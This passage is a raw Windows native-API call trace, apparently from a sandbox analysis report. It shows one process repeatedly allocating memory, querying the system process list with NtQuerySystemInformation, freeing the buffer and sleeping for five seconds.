SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.916] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.916] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.919] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.924] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.931] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.939] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.947] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.957] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.966] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.973] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.981] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.989] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.996] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.997] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.006] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.013] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.023] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.026] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.033] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.042] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.049] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.055] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.056] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.063] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.066] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.066] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.070] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.078] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 